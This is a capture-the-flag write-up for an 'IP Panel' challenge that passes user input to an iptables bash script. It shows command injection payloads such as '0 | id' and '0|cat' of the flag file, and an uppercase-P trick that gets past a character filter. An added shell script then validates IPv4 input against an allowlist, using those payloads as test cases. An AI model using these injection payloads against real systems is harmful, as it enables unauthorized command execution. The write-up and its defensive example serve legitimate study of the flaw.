17 – IP Panel
Exploit Mozilla's IP Panel! This IP Panel is used for whitelisting IP addresses. We know that the web interface will call a bash script that will execute an iptables command without validation. Find the flag somewhere in /home/ippanel/ and submit it!
Update: The files are not actually in the home directory. Look somewhere else. Sorry!
gold: 250 +3 (1st), +2 (2nd), +1 (3rd)
As the description says, this calls a bash script that executes iptables,
so we try to add something else to the command:
0 | id
And bingo, we see something:
Adding "0 | id" uid=80(www) gid=80(www) groups=80(www)
So we can execute our commands easily, but the only problem is some filters
for some characters like (p, [, ], ; etc.).
We tried to see what the current directory contains:
0 | ls
And we obtain:
Adding "0 | ls" CSS
It's obvious that it returns only the first line, so we used sed to print the other lines one by one.
p is filtered, so we just turn it to uppercase to bypass the filter:
0||ls|sed -n 'nP'
An interesting file name showed up in the 4th line:
Adding "0||ls|sed -n '2P'" index.php
Adding "0||ls|sed -n '3P'||" parser.sh
Adding "0||ls|sed -n '4P'" th15-15_th3_fl4g.txt
We try to open it through the browser, but it seems there are not enough permissions,
so we just use that bash script again:
Adding "0|cat th15-15_th3_fl4g.txt" i1gALKeMunqCcyeVMud7TCbI
and finally some flag
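
The root cause above is that the form value reaches the shell unvalidated, and the character filter is a denylist that an uppercase P slips past. As an added example (not the challenge's parser.sh, whose contents the write-up does not show), here is an allowlist check that accepts only a dotted-quad IPv4 address; the function names and the iptables rule are assumptions.

```shell
#!/bin/sh
# Added example, not the challenge's parser.sh. Function names and the
# iptables rule are assumptions made for illustration.

# Succeed only for a strict dotted-quad IPv4 address (four octets, 0-255).
valid_ipv4() {
    v_ip=$1
    case $v_ip in
        ''|*[!0-9.]*) return 1 ;;         # allowlist: digits and dots only
        *.*.*.*.*|*..*|.*|*.) return 1 ;; # too many or empty fields
        *.*.*.*) ;;                       # exactly four fields
        *) return 1 ;;
    esac
    v_ifs=$IFS; IFS=.
    set -- $v_ip                          # safe: only digits and dots remain
    IFS=$v_ifs
    for v_octet in "$@"; do
        [ "${#v_octet}" -le 3 ] && [ "$v_octet" -le 255 ] || return 1
    done
    return 0
}

# Print the rule that would be added (dry run by default), or refuse.
whitelist_ip() {
    if ! valid_ipv4 "$1"; then
        printf 'rejected: %s\n' "$1" >&2
        return 1
    fi
    if [ "${DRY_RUN:-1}" = 1 ]; then
        printf 'iptables -A INPUT -s %s -j ACCEPT\n' "$1"
    else
        iptables -A INPUT -s "$1" -j ACCEPT   # value passed as one quoted argument
    fi
}

# Constructed inputs: one valid address plus the payloads from the write-up.
for sample in '192.0.2.10' '0 | id' "0||ls|sed -n '2P'" '256.1.1.1'; do
    whitelist_ip "$sample" || true
done
```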
